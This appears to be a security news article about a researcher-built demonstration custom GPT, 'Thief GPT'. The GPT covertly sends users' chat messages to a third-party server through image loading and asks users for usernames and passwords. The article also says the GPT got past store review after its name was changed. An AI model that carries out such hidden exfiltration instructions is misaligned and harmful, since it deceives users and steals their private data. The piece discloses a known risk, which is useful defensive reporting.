Malicious ChatGPT Agents May Steal Chat Messages and Data


In November 2023, OpenAI released GPTs publicly for everyone to create their customized version of GPT models. Several new customized GPTs were created for different purposes. However, on the other hand, threat actors can also utilize this public GPT model to create their versions of GPTs to perform various malicious activities.

Researchers have developed a new GPT to demonstrate the ease with which cybercriminals can steal user information, such as chat messages and passwords, or create malicious code through certain chat requests.

Thief GPT

This new malicious ChatGPT agent was created to forward users’ chat messages to a third-party server and ask for sensitive information such as username and password. 

Thief GPT
Thief GPT (Source: Embracethered)

This was possible as ChatGPT loads images from any website, which requires data to be sent to a third-party server. Moreover, a GPT can also contain instructions to ask the user for information and can send it anywhere, depending upon the configuration of the GPT.

The new demo GPT was named Thief GPT and was capable of asking questions to the user to send it to a third-party server secretly. However, when publishing it to users, there were specific guidelines that denied the request.

According to the documentation, ChatGPT allows three types of publishing for creators—only me (default), Anyone with a link, and Public. Nevertheless, since the researchers had the words “Steal” and “malicious”, it violated the “brand and usage” guidelines and was eventually rejected.

Rejected Guidelines
Rejected Guidelines (Source: Embracethered)

Later, it was quickly fixed and was accepted by the GPT store. This led to the conclusion that there are chances for malicious actors to utilize this publicly available GPT code for malicious purposes.

Furthermore, a complete report has been published, which provides details about the method, usage, and other information.



Source link